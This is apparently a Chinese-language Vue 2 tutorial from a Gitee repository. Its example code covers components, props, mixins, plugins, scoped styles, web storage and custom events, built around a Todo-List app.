        <h2>学校名称:{{ name }}</h2>
        <h2>学校地址:{{ address }}</h2>
        <button @click="showName">点我提示学校名</button>
    </div>
</template>

<script>
    export default {
        name: "School",
        data() {
            return {
                name: "UESTC",
                address: "成都",
            };
        },
        methods: {showName() {alert(this.name);},},
    };
</script>

<style>
    .demo {background-color: orange;}
</style>

src/components/Student.vue


<template>
    <div>
        <h2>学生姓名:{{ name }}</h2>
        <h2>学生年龄:{{ age }}</h2>
    </div>
</template>

<script>
    export default {
        name: "Student",
        data() {
            return {
                name: "cess",
                age: 18,
            };
        },
    };
</script>

src/App.vue

<template>
    <div>
        <img src="./assets/logo.png" alt="">
        <School></School>
        <Student></Student>
    </div>
</template>

<script>
// 引入组件
import School from './components/School.vue'
import Student from './components/Student.vue'

export default {
    name:'App',
    components:{ School, Student }
}
</script>

src/main.js

// 该文件是整个项目的入口文件

import Vue from 'vue'    // 引入Vue
import App from './App.vue' // 引入App组件,它是所有组件的父组件

Vue.config.productionTip = false

new Vue({
    el:'#app',
    render: h => h(App),   // render函数完成了这个功能:将App组件放入容器中
})// .$mount('#app')

public/index.html

<!DOCTYPE html>
<html lang="">
    <head>
        <meta charset="UTF-8">

        <!-- 针对IE浏览器的特殊配置,含义是让IE浏览器以最高渲染级别渲染页面 -->
        <meta http-equiv="X-UA-Compatible" content="IE=edge">

        <!-- 开启移动端的理想端口 -->
        <meta name="viewport" content="width=device-width, initial-scale=1.0">

        <!-- 配置页签图标 <%= BASE_URL %>是public所在路径,使用绝对路径 -->
        <link rel="icon" href="<%= BASE_URL %>favicon.ico">

        <!-- 配置网页标题 -->
        <title><%= htmlWebpackPlugin.options.title %></title>
    </head>
    <body>

       <!-- 当浏览器不支持js时,noscript中的元素就会被渲染 -->
       <noscript>
        <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>
      </noscript>

        <!-- 容器 -->
        <div id="app"></div>
    </body>
</html>
1

3.1.4.render 函数

import Vue from 'vue'
import App from './App.vue'

Vue.config.productionTip = false

new Vue({
    el:'#app',
    // render函数功能:将App组件放入容器中
    // 简写形式
    render: h => h(App),
    // 完整形式
    // render(createElement){
    //   return createElement(App)
    // }
})

3.1.5.关于不同版本的函数

  1. vue.jsvue.runtime.xxx.js 的区别 a. vue.js 是完整版的 Vue ,包含:核心功能+模板解析器 b. vue.runtime.xxx.js 是运行版的Vue,只包含核心功能,没有模板解析器 esm 就是 ES6 module
  2. 因为 vue.runtime.xxx.js 没有模板解析器,所以不能使用 template 配置项,需要使用 render 函数接收到的 createElement 函数去指定具体内容

3.1.6.vue.config.js 配置文件

vue inspect > output.js 可以查看到Vue脚手架的默认配置 使用 vue.config.js 可以对脚手架进行个性化定制,和 package.json 同级目录,详见 配置参考 | Vue CLI

module.exports = {
    pages: {
        index: {
            entry: 'src/index/main.js' // 入口
        }
    },
    lineOnSave: false // 关闭语法检查
}

14.Vue CLI ref props mixin plugin scoped


3.2.ref 属性


ref 被用来给元素或子组件注册引用信息(id的替代者)

  • 应用在 html 标签上获取的是真实 DOM元素 ,应用在组件标签上获取的是组件实例对象 vc
  • 使用方式 a. 打标识:<h1 ref="xxx"></h1>或<School ref="xxx"></School> b. 获取:this.$refs.xxx
<template>
    <div>
        <h1 v-text="msg" ref="title"></h1>
        <button ref="btn" @click="showDOM">点我输出上方的DOM元素</button>
        <School ref="sch"/>
    </div>
</template>

<script>
    import School from './components/School'

    export default {
        name:'App',
        components:{ School },
        data() {
            return {
                msg:'欢迎学习Vue!'
            }
        },
        methods: {
            showDOM(){
                console.log(this.$refs.title) // 真实DOM元素
                console.log(this.$refs.btn)  // 真实DOM元素
                console.log(this.$refs.sch)  // School组件的实例对象(vc)
            }
        },
    }
</script>
1

3.3.props 配置项

props 让组件接收外部传过来的数据

  • 传递数据 <Demo name="xxx" :age="18"/> 这里age前加:,通过v-bind使得里面的18是数字
  • 接收数据 第一种方式(只接收)props:['name', 'age'] 第二种方式(限制类型)props:{name:String, age:Number} 第三种方式(限制类型、限制必要性、指定默认值)
props: {
    name: {
        type: String,  // 类型
        required: true,// 必要性
        default: 'cess'// 默认值
    }
}

备注:props是只读的,Vue底层会监测你对props的修改,如果进行了修改,就会发出警告,若业务需求确实需要修改,那么请复制props的内容到data中,然后去修改data中的数据

src/App.vue

<template>
    <div>
        <Student name="李四" sex="女" :age="18"/>
        <Student name="王五" sex="男" :age="18"/>
    </div>
</template>

<script>
    import Student from './components/Student'

    export default {
        name:'App',
        components:{ Student }
    }
</script>

src/components/Student.vue

<template>
    <div>
        <h1>{{ msg }}</h1>
        <h2>学生姓名:{{ name }}</h2>
        <h2>学生性别:{{ sex }}</h2>
        <h2>学生年龄:{{ myAge + 1 }}</h2>
        <button @click="updateAge">尝试修改收到的年龄</button>
    </div>
</template>

<script>
export default {
    name: "Student",
    data() {
        console.log(this);
        return {
            msg: "我是一个UESTC大学的学生",
            myAge: this.age,
        };
    },
    methods: { updateAge() { this.myAge++; }, },
    // 简单声明接收
    // props:['name','age','sex']

    // 接收的同时对数据进行类型限制
    //   props: {
    //     name: String,
    //     age: Number,
    //     sex: String,
    //   }

    // 接收的同时对数据:进行类型限制+默认值的指定+必要性的限制
    props: {
        name: {
            type: String,  //name的类型是字符串
            required: true, //name是必要的
        },
        age: {
            type: Number,
            default: 99, //默认值
        },
        sex: {
            type: String,
            required: true,
        },
    },
};
</script>
2

3.4.mixin 混入


  1. 功能:可以把多个组件共用的配置提取成一个混入对象

  2. 使用方式 a. 定义混入

    const mixin = {
        data() {....},
        methods: {....}
        ....
    }

    b. 使用混入 ⅰ. 全局混入Vue.mixin(xxx) ⅱ. 局部混入mixins:['xxx']

备注

  1. 组件和混入对象含有同名选项时,这些选项将以恰当的方式进行“合并”,在发生冲突时以组件优先

    var mixin = {
     data: function () {
      return {
          message: 'hello',
                foo: 'abc'
         }
       }
    }
    
    new Vue({
       mixins: [mixin],
       data () {
         return {
            message: 'goodbye',
                 bar: 'def'
         }
        },
       created () {
         console.log(this.$data)
         // => { message: "goodbye", foo: "abc", bar: "def" }
       }
    })
  2. 同名生命周期钩子将合并为一个数组,因此都将被调用。另外,混入对象的钩子将在组件自身钩子之前调用

    var mixin = {
       created () {
         console.log('混入对象的钩子被调用')
       }
    }
    
    new Vue({
       mixins: [mixin],
       created () {
         console.log('组件钩子被调用')
       }
    })
    
    // => "混入对象的钩子被调用"
    // => "组件钩子被调用"

src/mixin.js

export const hunhe = {
    methods: {
        showName(){
            alert(this.name)
        }
    },
    mounted() {
        console.log('你好啊!')
    },
}

export const hunhe2 = {
    data() {
        return {
            x:100,
            y:200
        }
    },
}

src/components/School.vue

<template>
    <div>
        <h2 @click="showName">学校名称:{{name}}</h2>
        <h2>学校地址:{{address}}</h2>
    </div>
</template>

<script>
    //引入一个hunhe
    import {hunhe,hunhe2} from '../mixin'

    export default {
        name:'School',
        data() {
            return {
                name:'尚硅谷',
                address:'北京',
                x:666
            }
        },
        mixins:[hunhe,hunhe2] // 局部混入
    }
</script>

src/components/Student.vue

<template>
    <div>
        <h2 @click="showName">学生姓名:{{name}}</h2>
        <h2>学生性别:{{sex}}</h2>
    </div>
</template>

<script>
    import {hunhe,hunhe2} from '../mixin'

    export default {
        name:'Student',
        data() {
            return {
                name:'张三',
                sex:''
            }
        },
        mixins:[hunhe,hunhe2] // 局部混入
    }
</script>

src/App.vue

<template>
    <div>
        <School/>
        <hr>
        <Student/>
    </div>
</template>

<script>
    import School from './components/School'
    import Student from './components/Student'

    export default {
        name:'App',
        components:{School,Student}
    }
</script>

src/main.js

import Vue from 'vue'
import App from './App.vue'
// import {mixin} from './mixin'

Vue.config.productionTip = false
// Vue.mixin(hunhe)  // 全局混合引入
// Vue.mixin(hunhe2) // 全局混合

new Vue({
    el:"#app",
    render: h => h(App)
})
3

3.5.plugin 插件


  1. 功能:用于增强 Vue
  2. 本质:包含 install 方法的一个对象, install 的第一个参数是 Vue ,第二个以后的参数是插件使用者传递的数据
  3. 定义插件(见下 src/plugin.js)
  4. 使用插件:Vue.use()

src/plugin.js

export default {
    install(Vue,x,y,z){
        console.log(x,y,z)
        //全局过滤器
        Vue.filter('mySlice', function(value){return value.slice(0,4)})

        //定义全局指令
        Vue.directive('fbind',{
            //指令与元素成功绑定时(一上来)
            bind(element,binding){element.value = binding.value},
            //指令所在元素被插入页面时
            inserted(element,binding){element.focus()},
            //指令所在的模板被重新解析时
            update(element,binding){element.value = binding.value}
        })

        //定义混入
        Vue.mixin({
            data() {return {x:100,y:200}},
        })

        //给Vue原型上添加一个方法(vm和vc就都能用了)
        Vue.prototype.hello = ()=>{alert('你好啊')}
    }
}

src/main.js

import Vue from 'vue'
import App from './App.vue'
import plugins from './plugins' // 引入插件

Vue.config.productionTip = false

Vue.use(plugins,1,2,3) // 应用(使用)插件

new Vue({
    el:'#app',
    render: h => h(App)
})

src/components/School.vue

<template>
    <div>
        <h2>学校名称:{{ name | mySlice }}</h2>
        <h2>学校地址:{{ address }}</h2>
        <button @click="test">点我测试一个hello方法</button>
    </div>
</template>

<script>
    export default {
        name:'School',
        data() {
            return {
                name:'尚硅谷atguigu',
                address:'北京',
            }
        },
        methods: {
            test(){
                this.hello()
            }
        },
    }
</script>

src/components/Student.vue

<template>
    <div>
        <h2>学生姓名:{{ name }}</h2>
        <h2>学生性别:{{ sex }}</h2>
        <input type="text" v-fbind:value="name">
    </div>
</template>

<script>
  export default {
        name:'Student',
        data() {
            return {
                name:'张三',
                sex:''
            }
        },
  }
</script>
4

3.6.scoped样式


  1. 作用:让样式在局部生效,防止冲突
  2. 写法:<style scoped>

Vue中的webpack并没有安装最新版,导致有些插件也不能默认安装最新版,如 npm i less-loader@7,而不是最新版

src/components/School.vue

<template>
    <div class="demo">
        <h2 class="title">学校名称:{{ name }}</h2>
        <h2>学校地址:{{ address }}</h2>
    </div>
</template>

<script>
    export default {
        name:'School',
        data() {
            return {
                name:'尚硅谷atguigu',
                address:'北京',
            }
        }
    }
</script>

<style scoped>
    .demo{
        background-color: skyblue;
    }
</style>

src/components/Student.vue

<template>
    <div class="demo">
        <h2 class="title">学生姓名:{{ name }}</h2>
        <h2 class="atguigu">学生性别:{{ sex }}</h2>
    </div>
</template>

<script>
    export default {
        name: 'Student',
        data() {
            return {
                name: '张三',
                sex: ''
            }
        }
    }
</script>

<style lang="less" scoped>
    .demo {
        background-color: pink;
        .atguigu {
            font-size: 40px;
        }
    }
</style>

src/App.vue

<template>
    <div>
        <h1 class="title">你好啊</h1>
        <School/>
        <Student/>
    </div>
</template>

<script>
    import Student from './components/Student'
    import School from './components/School'

    export default {
        name: 'App',
        components: { School, Student }
    }
</script>

<style scoped>
    .title {
        color: red;
    }
</style>
5

15.Vue CLI Todo-List案例


3.7.Todo-List 案例


组件化编码流程:

  1. 拆分静态组件:组件要按照功能点拆分,命名不要与html元素冲突
  2. 实现动态组件:考虑好数据的存放位置,数据是一个组件在用,还是一些组件在用
    • 一个组件在用:放在组件自身即可
    • 一些组件在用:放在他们共同的父组件上(状态提升)
  3. 实现交互:从绑定事件开始

props 适用于

a. 父组件 ==> 子组件 通信 b. 子组件 ==> 父组件 通信(要求父组件先给子组件一个函数)

使用 v-model 时要切记:v-model 绑定的值不能是 props 传过来的值,因为 props 是不可以修改的 props 传过来的若是对象类型的值,修改对象中的属性时Vue不会报错,但不推荐这样做

src/App.vue

<template>
    <div id="root">
        <div class="todo-container">
            <div class="todo-wrap">
                <MyHeader :addTodo="addTodo"/>
                <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo"/>
                <MyFooter :todos="todos"
                      :checkAllTodo="checkAllTodo" :clearAllTodo="clearAllTodo"/>
            </div>
        </div>
    </div>
</template>

<script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
        name: 'App',
        components: { MyHeader, MyList, MyFooter },
        data() {
            return {
                // 由于todos是MyHeader组件和MyFooter组件都在使用,所以放在App中(状态提升)
                todos:[
                    {id:'001',title:'抽烟',done:true},
                    {id:'002',title:'喝酒',done:false},
                    {id:'003',title:'开车',done:true}
                ]
            }
        },
        methods: {
            //添加一个todo
            addTodo(todoObj){
                this.todos.unshift(todoObj)
            },
            //勾选or取消勾选一个todo
            checkTodo(id){
                this.todos.forEach((todo)=>{
                    if(todo.id === id) todo.done = !todo.done
                })
            },
            //删除一个todo
            deleteTodo(id){
                this.todos = this.todos.filter( todo => todo.id !== id )
            },
            //全选or取消全选
            checkAllTodo(done){
                this.todos.forEach((todo)=>{
                    todo.done = done
                })
            },
            //清除所有已经完成的todo
            clearAllTodo(){
                this.todos = this.todos.filter((todo)=>{
                    return !todo.done
                })
            }
        }
    }
</script>

<style>
  /*base*/
    body {background: #fff;}
    .btn {
        display: inline-block;padding: 4px 12px;          margin-bottom: 0;
        font-size: 14px;
        line-height: 20px;
        text-align: center;
        vertical-align: middle;
        cursor: pointer;
        box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
        border-radius: 4px;
    }
    .btn-danger {
        color: #fff;
        background-color: #da4f49;
        border: 1px solid #bd362f;
    }
    .btn-danger:hover {
        color: #fff;
        background-color: #bd362f;
    }
    .btn:focus {outline: none;}
    .todo-container {
        width: 600px;
        margin: 0 auto;
    }
    .todo-container .todo-wrap {
        padding: 10px;
        border: 1px solid #ddd;
        border-radius: 5px;
    }
</style>

src/components/MyHeader.vue

<template>
    <div class="todo-header">
        <input type="text" placeholder="请输入你的任务名称,按回车键确认"
              v-model="title" @keyup.enter="add"/>
    </div>
</template>

<script>
    import {nanoid} from 'nanoid'
    export default {
        name:'MyHeader',
        props:['addTodo'], // 接收从App传递过来的addTodo
        data() {
            return {
                title:''    // 收集用户输入的title
            }
        },
        methods: {
            add(){
                // 校验数据
                if(!this.title.trim()) return alert('输入不能为空')
                // 将用户的输入包装成一个todo对象
                const todoObj = { id:nanoid(), title:this.title, done:false }
                // 通知App组件去添加一个todo对象
                this.addTodo(todoObj)
                // 清空输入
                this.title = ''
            }
        },
    }
</script>

<style scoped>
    /*header*/
    .todo-header input {
        width: 560px;
        height: 28px;
        font-size: 14px;
        border: 1px solid #ccc;
        border-radius: 4px;
        padding: 4px 7px;
    }
    .todo-header input:focus {
        outline: none;
        border-color: rgba(82, 168, 236, 0.8);
        box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 8px rgba(82, 168, 236, 0.6);
    }
</style>

src/components/MyList.vue

<template>
    <ul class="todo-main">
        <MyItem v-for="todoObj in todos":key="todoObj.id"
              :todo="todoObj" :checkTodo="checkTodo":deleteTodo="deleteTodo"/>
    </ul>
</template>

<script>
    import MyItem from './MyItem'

    export default {
        name:'MyList',
        components:{MyItem},
        // 声明接收App传递的数据,其中todos是自己用的,checkTodo和deleteTodo是给子组件MyItem用的
        props:['todos','checkTodo','deleteTodo']
    }
</script>

<style scoped>
    /*main*/
    .todo-main {
        margin-left: 0px;
        border: 1px solid #ddd;
        border-radius: 2px;
        padding: 0px;
    }
    .todo-empty {
        height: 40px;
        line-height: 40px;
        border: 1px solid #ddd;
        border-radius: 2px;
        padding-left: 5px;
        margin-top: 10px;
    }
</style>

src/components/MyItem.vue

<template>
    <li>
        <label>
            <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了props -->
            <!-- <input type="checkbox" v-model="todo.done"/> -->
            <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
            <span>{{ todo.title }}</span>
        </label>
        <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
</template>

<script>
    export default {
        name:'MyItem',
        //声明接收todo、checkTodo、deleteTodo
        props:['todo','checkTodo','deleteTodo'],
        methods: {
            // 勾选or取消勾选
            handleCheck(id){
                this.checkTodo(id) // 通知App组件将对应的todo对象的done值取反
            },
            // 删除
            handleDelete(id){
                if(confirm('确定删除吗?')){
                    this.deleteTodo(id) // 通知App组件将对应的todo对象删除
                }
            }
        },
    }
</script>

<style scoped>
    /*item*/
    li {
        list-style: none;
        height: 36px;
        line-height: 36px;
        padding: 0 5px;
        border-bottom: 1px solid #ddd;
    }
    li label {
        float: left;
        cursor: pointer;
    }
    li label li input {
        vertical-align:middle;
        margin-right:6px;
        position:relative;
        top: -1px;
    }
    li button {
        float: right;
        display: none;
        margin-top: 3px;
    }
    li:before {content: initial;}
    li:last-child {border-bottom: none;}
    li:hover{background-color: #ddd;}
    li:hover button{display: block;}
</style>

src/components/MyFooter.vue

<template>
    <div class="todo-footer" v-show="total">
        <label>
            <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
            <input type="checkbox" v-model="isAll"/>
        </label>
        <span>
            <span>已完成{{ doneTotal }}</span> / 全部{{ total }}
        </span>
        <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
    </div>
</template>

<script>
    export default {
        name:'MyFooter',
        props:['todos','checkAllTodo','clearAllTodo'],
        computed: {
            // 总数
            total(){
                return this.todos.length
            },
            // 已完成数
            doneTotal(){
                    //此处使用reduce方法做条件统计
                return this.todos.reduce((pre,todo)=> pre + (todo.done ? 1 : 0) ,0)
            },
            // 控制全选框
            isAll:{
                //全选框是否勾选
                get(){
                    return this.doneTotal === this.total && this.total > 0
                },
                //isAll被修改时set被调用
                set(value){
                    this.checkAllTodo(value)
                }
            }
        },
        methods: {
            /* checkAll(e){
                    this.checkAllTodo(e.target.checked)
                } */
            //清空所有已完成
            clearAll(){
                this.clearAllTodo()
            }
        },
    }
</script>

<style scoped>
    /*footer*/
    .todo-footer {
        height: 40px;
        line-height: 40px;
        padding-left: 6px;
        margin-top: 5px;
    }
    .todo-footer label {
        display: inline-block;
        margin-right: 20px;
        cursor: pointer;
    }
    .todo-footer label input {
        position: relative;
        top: -1px;
        vertical-align: middle;
        margin-right: 5px;
    }
    .todo-footer button {
        float: right;
        margin-top: 5px;
    }
</style>
14

16.Vue CLI 本地存储 自定义事件


3.8.WebStorage(js 本地存储)


存储内容大小一般支持 5MB 左右(不同浏览器可能还不一样)

浏览器端通过 Window.sessionStorageWindow.localStorage 属性来实现本地存储机制

相关API

xxxStorage.setItem('key', 'value') 该方法接受一个键和值作为参数,会把键值对添加到存储中,如果键名存在,则更新其对应的值

xxxStorage.getItem('key') 该方法接受一个键名作为参数,返回键名对应的值

xxxStorage.removeItem('key') 该方法接受一个键名作为参数,并把该键名从存储中删除

xxxStorage.clear() 该方法会清空存储中的所有数据

备注

  • SessionStorage 存储的内容会随着浏览器窗口关闭而消失
  • LocalStorage 存储的内容,需要手动清除才会消失
  • xxxStorage.getItem(xxx) 如果 xxx 对应的 value 获取不到,那么 getItem() 的返回值是 null
  • JSON.parse(null) 的结果依然是 null

localStorage

<h2>localStorage</h2>
<button onclick="saveDate()">点我保存数据</button><br/>
<button onclick="readDate()">点我读数据</button><br/>
<button onclick="deleteDate()">点我删除数据</button><br/>
<button onclick="deleteAllDate()">点我清空数据</button><br/>

<script>
    let person = {name:"JOJO",age:20}

    function saveDate(){
        localStorage.setItem('msg','localStorage')
        localStorage.setItem('person',JSON.stringify(person))
    }
    function readDate(){
        console.log(localStorage.getItem('msg'))
        const person = localStorage.getItem('person')
        console.log(JSON.parse(person))
    }
    function deleteDate(){
        localStorage.removeItem('msg')
        localStorage.removeItem('person')
    }
    function deleteAllDate(){
        localStorage.clear()
    }
</script>

sessionStorage

<h2>sessionStorage</h2>
<button onclick="saveDate()">点我保存数据</button><br/>
<button onclick="readDate()">点我读数据</button><br/>
<button onclick="deleteDate()">点我删除数据</button><br/>
<button onclick="deleteAllDate()">点我清空数据</button><br/>

<script>
    let person = {name:"JOJO",age:20}

    function saveDate(){
        sessionStorage.setItem('msg','sessionStorage')
        sessionStorage.setItem('person',JSON.stringify(person))
    }
    function readDate(){
        console.log(sessionStorage.getItem('msg'))
        const person = sessionStorage.getItem('person')
        console.log(JSON.parse(person))
    }
    function deleteDate(){
        sessionStorage.removeItem('msg')
        sessionStorage.removeItem('person')
    }
    function deleteAllDate(){
        sessionStorage.clear()
    }
</script>

使用本地存储优化Todo-List

src/App.vue

<template>
    <div id="root">
        <div class="todo-container">
            <div class="todo-wrap">
                <MyHeader :addTodo="addTodo"/>
                <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo"/>
                <MyFooter :todos="todos" :checkAllTodo="checkAllTodo" :clearAllTodo="clearAllTodo"/>
            </div>
        </div>
    </div>
</template>

<script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
        name:'App',
        components:{MyHeader,MyList,MyFooter},
        data() {
            return {
                // 🔴从本地存储中获得数据,null就创建空数组[]
                todos:JSON.parse(localStorage.getItem('todos')) || []
            }
        },
        methods: {
            //添加一个todo
            addTodo(todoObj){
                this.todos.unshift(todoObj)
            },
            //勾选or取消勾选一个todo
            checkTodo(id){
                this.todos.forEach((todo)=>{
                    if(todo.id === id) todo.done = !todo.done
                })
            },
            //删除一个todo
            deleteTodo(id){
                this.todos = this.todos.filter( todo => todo.id !== id )
            },
            //全选or取消全选
            checkAllTodo(done){
                this.todos.forEach((todo)=>{
                    todo.done = done
                })
            },
            //清除所有已经完成的todo
            clearAllTodo(){
                this.todos = this.todos.filter((todo)=>{
                    return !todo.done
                })
            }
        },
        // 🔴数据发生改变就放到本地存储中,注意深度侦听,以及JSON转化为字符串
        watch: {
            todos:{
                deep:true,
                handler(value){
                    localStorage.setItem('todos',JSON.stringify(value))
                }
            }
        },
    }
</script>

3.9.组件的自定义事件


  1. 一种组件间通信的方式,适用于:子组件 ===> 父组件

  2. 使用场景:子组件想给父组件传数据,那么就要在父组件中给子组件绑定自定义事件(事件的回调在A中

  3. 绑定自定义事件 a. 第一种方式,在父组件中<Demo @事件名="方法"/>或<Demo v-on:事件名="方法"/> b. 第二种方式,在父组件中this.$refs.demo.$on('事件名',方法)

        <Demo ref="demo"/>
        ......
        mounted(){
           this.$refs.demo.$on('atguigu',this.test)
        }

    c. 若想让自定义事件只能触发一次,可以使用once修饰符,或$once方法

  4. 触发自定义事件 this.$emit('事件名',数据)

  5. 解绑自定义事件 this.$off('事件名')

  6. 组件上也可以绑定原生DOM事件,需要使用 native 修饰符 @click.native="show" 上面绑定自定义事件,即使绑定的是原生事件也会被认为是自定义的,需要加native,加了后就将此事件给组件的根元素

  7. 注意:通过this.$refs.xxx.$on('事件名',回调函数)绑定自定义事件时,回调函数要么配置在methods中,要么用箭头函数,否则 this 指向会出问题

src/App.vue

<template>
    <div class="app">
        <h1>{{ msg }},学生姓名是:{{ studentName }}</h1>

        <!-- 通过父组件给子组件传递函数类型的props实现子给父传递数据 -->
        <School :getSchoolName="getSchoolName"/>

        <!-- 通过父组件给子组件绑定一个自定义事件实现子给父传递数据(第一种写法,使用@或v-on) -->
        <!-- <Student @atguigu="getStudentName" @demo="m1"/> -->

        <!-- 通过父组件给子组件绑定一个自定义事件实现子给父传递数据(第二种写法,使用ref) -->
        <Student ref="student" @click.native="show"/> <!-- 🔴native -->
    </div>
</template>

<script>
    import Student from './components/Student'
    import School from './components/School'

    export default {
        name:'App',
        components:{School,Student},
        data() {
            return {
                msg:'你好啊!',
                studentName:''
            }
        },
        methods: {
            getSchoolName(name){
                console.log('App收到了学校名:',name)
            },
            getStudentName(name,...params){
                console.log('App收到了学生名:',name,params)
                this.studentName = name
            },
            m1(){
                console.log('demo事件被触发了!')
            },
            show(){
                alert(123)
            }
        },
        mounted() {
            this.$refs.student.$on('atguigu',this.getStudentName) // 🔴绑定自定义事件
            // this.$refs.student.$once('atguigu',this.getStudentName) // 绑定自定义事件(一次性)
        },
    }
</script>

<style scoped>.app{background-color: gray;padding: 5px;}</style>

src/components/Student.vue

<template>
    <div class="student">
        <h2>学生姓名:{{name}}</h2>
        <h2>学生性别:{{sex}}</h2>
        <h2>当前求和为:{{number}}</h2>
        <button @click="add">点我number++</button>
        <button @click="sendStudentlName">把学生名给App</button>
        <button @click="unbind">解绑atguigu事件</button>
        <button @click="death">销毁当前Student组件的实例(vc)</button>
    </div>
</template>

<script>
    export default {
        name:'Student',
        data() {
            return {
                name:'张三',
                sex:'',
                number:0
            }
        },
        methods: {
            add(){
                console.log('add回调被调用了')
                this.number++
            },
            sendStudentlName(){
                // 触发Student组件实例身上的atguigu事件
                this.$emit('atguigu',this.name,666,888,900)
                // this.$emit('demo')
                // this.$emit('click')
            },
            unbind(){
                 // 🔴解绑
                this.$off('atguigu') //解绑一个自定义事件
                // this.$off(['atguigu','demo']) //解绑多个自定义事件
                // this.$off() //解绑所有的自定义事件
            },
            death(){
                // 销毁了当前Student组件的实例,销毁后所有Student实例的自定义事件全都不奏效
                this.$destroy()
            }
        },
    }
</script>

<style lang="less" scoped>
    .student{
        background-color: pink;
        padding: 5px;
        margin-top: 30px;
    }
</style>

使用自定义事件优化Todo-List

src/App.vue

<template>
    <div id="root">
        <div class="todo-container">
            <div class="todo-wrap">
                <MyHeader @addTodo="addTodo" />
                <MyList
                    :todos="todos"
                    :checkTodo="checkTodo"
                    :deleteTodo="deleteTodo"
                />
                <MyFooter
                    :todos="todos"
                    @checkAllTodo="checkAllTodo"
                    @clearAllTodo="clearAllTodo"
                />
            </div>
        </div>
    </div>
</template>

<script>
import MyHeader from './components/MyHeader';
import MyList from './components/MyList';
import MyFooter from './components/MyFooter.vue';

export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
        return {
            //由于todos是MyHeader组件和MyFooter组件都在使用,所以放在App中(状态提升)
            todos: JSON.parse(localStorage.getItem('todos')) || [],
        };
    },
    methods: {
        //添加一个todo
        addTodo(todoObj) {
            this.todos.unshift(todoObj);
        },
        //勾选or取消勾选一个todo
        checkTodo(id) {
            this.todos.forEach((todo) => {
                if (todo.id === id) todo.done = !todo.done;
            });
        },
        //删除一个todo
        deleteTodo(id) {
            this.todos = this.todos.filter((todo) => todo.id !== id);
        },
        //全选or取消全选
        checkAllTodo(done) {
            this.todos.forEach((todo) => {
                todo.done = done;
            });
        },
        //清除所有已经完成的todo
        clearAllTodo() {
            this.todos = this.todos.filter((todo) => {
                return !todo.done;
            });
        },
    },
    watch: {
        todos: {
            deep: true,
            handler(value) {
                localStorage.setItem('todos', JSON.stringify(value));
            },
        },
    },
};
</script>

src/components/MyHeader.vue

<template>
    <div class="todo-header">
        <input
            type="text"
            placeholder="请输入你的任务名称,按回车键确认"
            v-model="title"
            @keyup.enter="add"
        />
    </div>
</template>

<script>
import { nanoid } from 'nanoid';
export default {
    name: 'MyHeader',
    data() {
        return {
            title: '', // 收集用户输入的title
        };
    },
    methods: {
        add() {
            //校验数据
            if (!this.title.trim()) return alert('输入不能为空');
            //将用户的输入包装成一个todo对象
            const todoObj = { id: nanoid(), title: this.title, done: false };
            //通知App组件去添加一个todo对象
            this.$emit('addTodo', todoObj);
            //清空输入
            this.title = '';
        },
    },
};
</script>

src/components/MyFooter

<template>
    <div class="todo-footer" v-show="total">
        <label>
            <!-- <input type="checkbox" :checked="isAll" @change="checkAll"/> -->
            <input type="checkbox" v-model="isAll" />
        </label>
        <span>
            <span>已完成{{ doneTotal }}</span> / 全部{{ total }}
        </span>
        <button class="btn btn-danger" @click="clearAll">清除已完成任务</button>
    </div>
</template>

<script>
export default {
    name: 'MyFooter',
    props: ['todos'],
    computed: {
        //总数
        total() {
            return this.todos.length;
        },
        //已完成数
        doneTotal() {
            return this.todos.reduce(
                (pre, todo) => pre + (todo.done ? 1 : 0),
                0
            );
        },
        //控制全选框
        isAll: {
            //全选框是否勾选
            get() {
                return this.doneTotal === this.total && this.total > 0;
            },
            //isAll被修改时set被调用
            set(value) {
                // this.checkAllTodo(value)
                this.$emit('checkAllTodo', value);
            },
        },
    },
    methods: {
        //清空所有已完成
        clearAll() {
            // this.clearAllTodo()
            this.$emit('clearAllTodo');
        },
    },
};
</script>

空文件

发行版

暂无发行版

贡献者

全部

近期动态

加载更多
不能加载更多了
1
https://gitee.com/guojianwang/vue.git
git@gitee.com:guojianwang/vue.git
guojianwang
vue
Vue2.0+Vue3.0全套教程
master

搜索帮助

53164aa7 5694891 3bd8fe86 5694891